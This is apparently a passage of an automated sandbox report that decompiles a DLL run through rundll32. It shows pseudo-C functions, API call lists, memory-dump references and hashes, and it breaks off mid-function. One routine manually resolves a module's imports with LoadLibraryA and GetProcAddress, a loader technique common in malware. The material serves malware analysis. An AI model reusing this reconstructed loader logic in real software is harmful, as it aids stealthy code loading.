                                                                                                                                                                                                                						_v48 = (_v12 & 0x0000ffff) + _v92;
                                                                                                                                                                                                                						if((_v5 & 0x000000ff) != 3) {
                                                                                                                                                                                                                							if((_v5 & 0x000000ff) == 0xa) {
                                                                                                                                                                                                                								 *_v48 =  *_v48 + _v64;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                							 *_v48 =  *_v48 + _v64;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_v32 =  &(_v32[1]);
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_v52 = _v32;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				goto L13;
                                                                                                                                                                                                                			}









































                                                                                                                                                                                                                0x10014e05
                                                                                                                                                                                                                0x10014e12
                                                                                                                                                                                                                0x10014e18
                                                                                                                                                                                                                0x10014e21
                                                                                                                                                                                                                0x10014e24
                                                                                                                                                                                                                0x10014e27
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10014f18
                                                                                                                                                                                                                0x10014f1c
                                                                                                                                                                                                                0x10014f1e
                                                                                                                                                                                                                0x10014f2c
                                                                                                                                                                                                                0x1001504a
                                                                                                                                                                                                                0x1001504e
                                                                                                                                                                                                                0x10015113
                                                                                                                                                                                                                0x1001511c
                                                                                                                                                                                                                0x1001511f
                                                                                                                                                                                                                0x10015123
                                                                                                                                                                                                                0x10015129
                                                                                                                                                                                                                0x10015131
                                                                                                                                                                                                                0x10015131
                                                                                                                                                                                                                0x10015139
                                                                                                                                                                                                                0x10015147
                                                                                                                                                                                                                0x1001514a
                                                                                                                                                                                                                0x1001514e
                                                                                                                                                                                                                0x10015154
                                                                                                                                                                                                                0x10015164
                                                                                                                                                                                                                0x1001518f
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10015191
                                                                                                                                                                                                                0x1001516a
                                                                                                                                                                                                                0x1001517b
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10015189
                                                                                                                                                                                                                0x1001518d
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10015189
                                                                                                                                                                                                                0x1001517d
                                                                                                                                                                                                                0x10015181
                                                                                                                                                                                                                0x10015186
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10015186
                                                                                                                                                                                                                0x1001516c
                                                                                                                                                                                                                0x10015170
                                                                                                                                                                                                                0x10015172
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10015172
                                                                                                                                                                                                                0x10015156
                                                                                                                                                                                                                0x1001515a
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1001515c
                                                                                                                                                                                                                0x10015054
                                                                                                                                                                                                                0x10015058
                                                                                                                                                                                                                0x1001505a
                                                                                                                                                                                                                0x10015068
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1001506e
                                                                                                                                                                                                                0x10015077
                                                                                                                                                                                                                0x10015085
                                                                                                                                                                                                                0x10015091
                                                                                                                                                                                                                0x1001509d
                                                                                                                                                                                                                0x100150a6
                                                                                                                                                                                                                0x100150a9
                                                                                                                                                                                                                0x100150ad
                                                                                                                                                                                                                0x100150af
                                                                                                                                                                                                                0x100150bc
                                                                                                                                                                                                                0x100150d0
                                                                                                                                                                                                                0x100150df
                                                                                                                                                                                                                0x100150f0
                                                                                                                                                                                                                0x100150b9
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100150b9
                                                                                                                                                                                                                0x100150f2
                                                                                                                                                                                                                0x100150f6
                                                                                                                                                                                                                0x100150fb
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100150fb
                                                                                                                                                                                                                0x10015106
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10015108
                                                                                                                                                                                                                0x1001510c
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1001510e
                                                                                                                                                                                                                0x10014f32
                                                                                                                                                                                                                0x10014f3b
                                                                                                                                                                                                                0x10014f49
                                                                                                                                                                                                                0x10014f4c
                                                                                                                                                                                                                0x10014f69
                                                                                                                                                                                                                0x10014f70
                                                                                                                                                                                                                0x10014f82
                                                                                                                                                                                                                0x10014f82
                                                                                                                                                                                                                0x10014f89
                                                                                                                                                                                                                0x10014f99
                                                                                                                                                                                                                0x10014fb1
                                                                                                                                                                                                                0x10014f9b
                                                                                                                                                                                                                0x10014fa3
                                                                                                                                                                                                                0x10014fa3
                                                                                                                                                                                                                0x10014fb4
                                                                                                                                                                                                                0x10014fb8
                                                                                                                                                                                                                0x10014fc8
                                                                                                                                                                                                                0x10014feb
                                                                                                                                                                                                                0x10014ffd
                                                                                                                                                                                                                0x10014fca
                                                                                                                                                                                                                0x10014fde
                                                                                                                                                                                                                0x10014fde
                                                                                                                                                                                                                0x10015007
                                                                                                                                                                                                                0x10015023
                                                                                                                                                                                                                0x10015009
                                                                                                                                                                                                                0x10015018
                                                                                                                                                                                                                0x10015018
                                                                                                                                                                                                                0x1001502b
                                                                                                                                                                                                                0x10015034
                                                                                                                                                                                                                0x10015034
                                                                                                                                                                                                                0x10015042
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10014f8b
                                                                                                                                                                                                                0x10014f8d
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10014f8d
                                                                                                                                                                                                                0x10014f89
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10014f4c
                                                                                                                                                                                                                0x10014e2f
                                                                                                                                                                                                                0x10014e3d
                                                                                                                                                                                                                0x10014e42
                                                                                                                                                                                                                0x10014e4d
                                                                                                                                                                                                                0x10014e50
                                                                                                                                                                                                                0x10014e54
                                                                                                                                                                                                                0x10014e56
                                                                                                                                                                                                                0x10014e66
                                                                                                                                                                                                                0x10014e6f
                                                                                                                                                                                                                0x10014e78
                                                                                                                                                                                                                0x10014e80
                                                                                                                                                                                                                0x10014e89
                                                                                                                                                                                                                0x10014e94
                                                                                                                                                                                                                0x10014e9a
                                                                                                                                                                                                                0x10014e9d
                                                                                                                                                                                                                0x10014ea0
                                                                                                                                                                                                                0x10014ea7
                                                                                                                                                                                                                0x10014eae
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10014eb9
                                                                                                                                                                                                                0x10014ec7
                                                                                                                                                                                                                0x10014ed2
                                                                                                                                                                                                                0x10014edc
                                                                                                                                                                                                                0x10014ef4
                                                                                                                                                                                                                0x10014f01
                                                                                                                                                                                                                0x10014f01
                                                                                                                                                                                                                0x10014ede
                                                                                                                                                                                                                0x10014ee9
                                                                                                                                                                                                                0x10014ee9
                                                                                                                                                                                                                0x10014f08
                                                                                                                                                                                                                0x10014f08
                                                                                                                                                                                                                0x10014f10
                                                                                                                                                                                                                0x10014f10
                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 10014F63
                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(00000000), ref: 10014F7C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 10014FD8
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 10014FF7
                                                                                                                                                                                                                • lstrcmpA.KERNEL32(?,00000000), ref: 100150E8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1872726118-0
                                                                                                                                                                                                                • Opcode ID: 419c020a87105bdceccdc306fbfdf2abceeec5315adc811461ed6dcf7bea98ed
                                                                                                                                                                                                                • Instruction ID: f6e2eba122cbf77a2ae5ba8af3865ace0f975eec235aae4e96ffcfdcfd34bc1d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 419c020a87105bdceccdc306fbfdf2abceeec5315adc811461ed6dcf7bea98ed
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65E18D74A10209EFDB51CFA8C880BADBBF1FB08355F258569E815AF3A1D735E981CB50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: @$\u%04X$\u%04X\u%04X
                                                                                                                                                                                                                • API String ID: 0-2132903582
                                                                                                                                                                                                                • Opcode ID: d386108904b2367e7a539220f608067250315fab26c66a0f40ad273b13d001fd
                                                                                                                                                                                                                • Instruction ID: 2f7f0510fea53a2a38c644e53789d9b16a97eaeec47c91ed49662b1c0a338719
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d386108904b2367e7a539220f608067250315fab26c66a0f40ad273b13d001fd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE4106F1A0025567CF24CAA8ED95BEE3BD5DF41254F200116FE02EE255E675CDF092D1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                                                                                			E100145EB(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                                                                                                                                                                                                				signed int _t12;
                                                                                                                                                                                                                				signed int _t13;
                                                                                                                                                                                                                				signed int _t23;
                                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                                				char* _t31;
                                                                                                                                                                                                                				char* _t33;
                                                                                                                                                                                                                				char* _t35;
                                                                                                                                                                                                                				char* _t37;
                                                                                                                                                                                                                				char* _t38;
                                                                                                                                                                                                                				long long* _t40;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t30 = __edi;
                                                                                                                                                                                                                				_t12 = _a20;
                                                                                                                                                                                                                				if(_t12 == 0) {
                                                                                                                                                                                                                					_t12 = 0x11;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_t35 = _a4;
                                                                                                                                                                                                                				_push(_t25);
                                                                                                                                                                                                                				 *_t40 = _a12;
                                                                                                                                                                                                                				_push(_t12);
                                                                                                                                                                                                                				_push("%.*g");
                                                                                                                                                                                                                				_push(_a8);
                                                                                                                                                                                                                				_push(_t35);
                                                                                                                                                                                                                				L10014744();
                                                                                                                                                                                                                				_t23 = _t12;
                                                                                                                                                                                                                				if(_t23 < 0 || _t23 >= _a8) {
                                                                                                                                                                                                                					L16:
                                                                                                                                                                                                                					_t13 = _t12 | 0xffffffff;
                                                                                                                                                                                                                					goto L17;
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					E100145C4(_t12, _t35);
                                                                                                                                                                                                                					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
                                                                                                                                                                                                                						L8:
                                                                                                                                                                                                                						_push(_t30);
                                                                                                                                                                                                                						_t37 = strchr(_t35, 0x65);
                                                                                                                                                                                                                						_t31 = _t37;
                                                                                                                                                                                                                						if(_t37 == 0) {
                                                                                                                                                                                                                							L15:
                                                                                                                                                                                                                							_t13 = _t23;
                                                                                                                                                                                                                							L17:
                                                                                                                                                                                                                							return _t13;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_t38 = _t37 + 1;
                                                                                                                                                                                                                						_t33 = _t31 + 2;
                                                                                                                                                                                                                						if( *_t38 == 0x2d) {
                                                                                                                                                                                                                							_t38 = _t33;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						while( *_t33 == 0x30) {
                                                                                                                                                                                                                							_t33 = _t33 + 1;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						if(_t33 != _t38) {
                                                                                                                                                                                                                							E10009627(_t38, _t33, _t23 - _t33 + _a4);
                                                                                                                                                                                                                							_t23 = _t23 + _t38 - _t33;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						goto L15;
                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                						_t6 = _t23 + 3; // 0x10012dd6
                                                                                                                                                                                                                						_t12 = _t6;
                                                                                                                                                                                                                						if(_t12 >= _a8) {
                                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_t35[_t23] = 0x302e;
                                                                                                                                                                                                                						( &(_t35[2]))[_t23] = 0;
                                                                                                                                                                                                                						_t23 = _t23 + 2;
                                                                                                                                                                                                                						goto L8;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                			}













                                                                                                                                                                                                                0x100145eb
                                                                                                                                                                                                                0x100145ee
                                                                                                                                                                                                                0x100145f3
                                                                                                                                                                                                                0x100145f7
                                                                                                                                                                                                                0x100145f7
                                                                                                                                                                                                                0x100145fd
                                                                                                                                                                                                                0x10014601
                                                                                                                                                                                                                0x10014602
                                                                                                                                                                                                                0x10014605
                                                                                                                                                                                                                0x10014606
                                                                                                                                                                                                                0x1001460b
                                                                                                                                                                                                                0x1001460e
                                                                                                                                                                                                                0x1001460f
                                                                                                                                                                                                                0x10014614
                                                                                                                                                                                                                0x1001461b
                                                                                                                                                                                                                0x100146a4
                                                                                                                                                                                                                0x100146a4
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10014626
                                                                                                                                                                                                                0x10014627
                                                                                                                                                                                                                0x10014639
                                                                                                                                                                                                                0x1001465f
                                                                                                                                                                                                                0x1001465f
                                                                                                                                                                                                                0x10014668
                                                                                                                                                                                                                0x1001466a
                                                                                                                                                                                                                0x10014670
                                                                                                                                                                                                                0x1001469f
                                                                                                                                                                                                                0x1001469f
                                                                                                                                                                                                                0x100146a7
                                                                                                                                                                                                                0x100146aa
                                                                                                                                                                                                                0x100146aa
                                                                                                                                                                                                                0x10014672
                                                                                                                                                                                                                0x10014673
                                                                                                                                                                                                                0x10014679
                                                                                                                                                                                                                0x1001467b
                                                                                                                                                                                                                0x1001467b
                                                                                                                                                                                                                0x10014680
                                                                                                                                                                                                                0x1001467f
                                                                                                                                                                                                                0x1001467f
                                                                                                                                                                                                                0x10014687
                                                                                                                                                                                                                0x10014693
                                                                                                                                                                                                                0x1001469d
                                                                                                                                                                                                                0x1001469d
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10014649
                                                                                                                                                                                                                0x10014649
                                                                                                                                                                                                                0x10014649
                                                                                                                                                                                                                0x1001464f
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10014651
                                                                                                                                                                                                                0x10014657
                                                                                                                                                                                                                0x1001465c
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1001465c
                                                                                                                                                                                                                0x10014639

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: strchr$_snprintf
                                                                                                                                                                                                                • String ID: %.*g
                                                                                                                                                                                                                • API String ID: 3619936089-952554281
                                                                                                                                                                                                                • Opcode ID: b4e02f500dbcddab9fbb118d48120a078f2ff9c1d23ce214e2ebe6660eda143c
                                                                                                                                                                                                                • Instruction ID: 4f38b1db0cc1ba9a95d8daf564856a08a1274e3eb1987c121476b3081b14d048
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4e02f500dbcddab9fbb118d48120a078f2ff9c1d23ce214e2ebe6660eda143c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD210576604A562BE725CE689C85F9B3788DF032A8F270125F8449E1A1EFB1EDC04392
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727588899.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727558931.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727859066.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728054369.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728081580.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728113563.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728303912.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_69340000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _lock_unlockcalloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3876498383-0
                                                                                                                                                                                                                • Opcode ID: 30ec0759352225e0716ba92093262c380eb6c150035cf29b0649b0a0721d6924
                                                                                                                                                                                                                • Instruction ID: e57ba15901c9424b43c566300453cded90fc4af5f3279247c11cd0579015c456
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30ec0759352225e0716ba92093262c380eb6c150035cf29b0649b0a0721d6924
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B811F9751043418BE760DF28C68075A7BE4FF45754F158669E8E8CF285EB38D842CB6A
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                                                                			E1000B194(WCHAR* __ecx) {
                                                                                                                                                                                                                				int _v8;
                                                                                                                                                                                                                				WCHAR* _v12;
                                                                                                                                                                                                                				short _v532;
                                                                                                                                                                                                                				WCHAR* _t17;
                                                                                                                                                                                                                				WCHAR* _t21;
                                                                                                                                                                                                                				WCHAR* _t24;
                                                                                                                                                                                                                				WCHAR** _t27;
                                                                                                                                                                                                                				signed int _t28;
                                                                                                                                                                                                                				signed int _t29;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                				_t21 = __ecx;
                                                                                                                                                                                                                				_t29 = _t28 | 0xffffffff;
                                                                                                                                                                                                                				_t27 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
                                                                                                                                                                                                                				if(_t27 != 0 && _v8 > 0) {
                                                                                                                                                                                                                					_t24 =  *_t27;
                                                                                                                                                                                                                					if( *_t24 == 0x5c || _t24[1] == 0x3a) {
                                                                                                                                                                                                                						lstrcpynW(_t21, _t24, 0x104);
                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                						GetCurrentDirectoryW(0x104,  &_v532);
                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                						_push( *_t27);
                                                                                                                                                                                                                						_push("\\");
                                                                                                                                                                                                                						_t17 = E10009DC8( &_v532);
                                                                                                                                                                                                                						_v12 = _t17;
                                                                                                                                                                                                                						lstrcpynW(_t21, _t17, 0x104);
                                                                                                                                                                                                                						E1000953B( &_v12, 0xfffffffe);
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t29 = 0;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				return _t29;
                                                                                                                                                                                                                			}












                                                                                                                                                                                                                0x1000b19d
                                                                                                                                                                                                                0x1000b1a4
                                                                                                                                                                                                                0x1000b1a6
                                                                                                                                                                                                                0x1000b1ba
                                                                                                                                                                                                                0x1000b1be
                                                                                                                                                                                                                0x1000b1c6
                                                                                                                                                                                                                0x1000b1cc
                                                                                                                                                                                                                0x1000b222
                                                                                                                                                                                                                0x1000b1d5
                                                                                                                                                                                                                0x1000b1e2
                                                                                                                                                                                                                0x1000b1e8
                                                                                                                                                                                                                0x1000b1ea
                                                                                                                                                                                                                0x1000b1f2
                                                                                                                                                                                                                0x1000b1f8
                                                                                                                                                                                                                0x1000b200
                                                                                                                                                                                                                0x1000b206
                                                                                                                                                                                                                0x1000b212
                                                                                                                                                                                                                0x1000b218
                                                                                                                                                                                                                0x1000b228
                                                                                                                                                                                                                0x1000b228
                                                                                                                                                                                                                0x1000b230

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCommandLineW.KERNEL32(00000000,00000000,00000001), ref: 1000B1A9
                                                                                                                                                                                                                • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 1000B1B4
                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 1000B1E2
                                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 1000B206
                                                                                                                                                                                                                  • Part of subcall function 1000953B: HeapFree.KERNEL32(00000000,00000000), ref: 10009581
                                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,00000104), ref: 1000B222
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CommandLinelstrcpyn$ArgvCurrentDirectoryFreeHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3637931765-0
                                                                                                                                                                                                                • Opcode ID: e014ea068a66f965b81fdf9b6b28a64a0d01f846ec91616c0c377a967c2fd5ed
                                                                                                                                                                                                                • Instruction ID: 92cfb7d19344df0840c9c24c95e32cfe92fb274ad31b5fe10eba1c98c5779baa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e014ea068a66f965b81fdf9b6b28a64a0d01f846ec91616c0c377a967c2fd5ed
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D01182B1D00219BBEB11DBA4DC8DFAAB7FCEF063A9F204559E511A2190E7B099818790
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                                                                			E1001478C(signed int __eax, void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                				intOrPtr* _v8;
                                                                                                                                                                                                                				signed int* _v12;
                                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                                				signed int _v20;
                                                                                                                                                                                                                				signed int _v24;
                                                                                                                                                                                                                				signed int _v28;
                                                                                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                                                                                				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                                				signed int _v44;
                                                                                                                                                                                                                				struct HINSTANCE__* _v48;
                                                                                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                                                                                				signed int _v56;
                                                                                                                                                                                                                				intOrPtr _v60;
                                                                                                                                                                                                                				signed int _v64;
                                                                                                                                                                                                                				signed int _t109;
                                                                                                                                                                                                                				signed int _t112;
                                                                                                                                                                                                                				signed int _t115;
                                                                                                                                                                                                                				void* _t163;
                                                                                                                                                                                                                				void* _t167;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t167 = __ecx;
                                                                                                                                                                                                                				_v44 = _v44 & 0x00000000;
                                                                                                                                                                                                                				if(_a4 != 0) {
                                                                                                                                                                                                                					_v48 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                                                                                					_v40 = E100097F9(_t167, _v48, "GetProcAddress");
                                                                                                                                                                                                                					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                                                                                                                                					_v32 = _v52;
                                                                                                                                                                                                                					_t109 = 8;
                                                                                                                                                                                                                					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                                                                                                                                                                                                                						L24:
                                                                                                                                                                                                                						return 0;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_v56 = 0x80000000;
                                                                                                                                                                                                                					_t112 = 8;
                                                                                                                                                                                                                					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                                                                                                                                                                                                                					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                                                                						_v8 = _v8 + 0x14;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t115 = 8;
                                                                                                                                                                                                                					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                                                                                                                                                                                                                					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                                                                						_t34 = _v8 + 0xc; // 0xffff
                                                                                                                                                                                                                						_v36 = LoadLibraryA( *_t34 + _a4);
                                                                                                                                                                                                                						if(_v36 != 0) {
                                                                                                                                                                                                                							if( *_v8 == 0) {
                                                                                                                                                                                                                								_t43 = _v8 + 0x10; // 0xb8
                                                                                                                                                                                                                								_v12 =  *_t43 + _a4;
                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                								_v12 =  *_v8 + _a4;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							_v28 = _v28 & 0x00000000;
                                                                                                                                                                                                                							while( *_v12 != 0) {
                                                                                                                                                                                                                								_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                                								_v64 = _v64 & 0x00000000;
                                                                                                                                                                                                                								_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                                								if(( *_v12 & _v56) == 0) {
                                                                                                                                                                                                                									_v60 =  *_v12 + _a4;
                                                                                                                                                                                                                									_v20 = _v60 + 2;
                                                                                                                                                                                                                									_t73 = _v8 + 0x10; // 0xb8
                                                                                                                                                                                                                									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
                                                                                                                                                                                                                									_v16 = _v40(_v36, _v20);
                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                									_v24 =  *_v12;
                                                                                                                                                                                                                									_v20 = _v24 & 0x0000ffff;
                                                                                                                                                                                                                									_v16 = _v40(_v36, _v20);
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								if(_v24 != _v16) {
                                                                                                                                                                                                                									_v44 = _v44 + 1;
                                                                                                                                                                                                                									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                                                                                                                                                                                                                										 *_v12 = _v16;
                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                										_t89 = _v8 + 0x10; // 0xb8
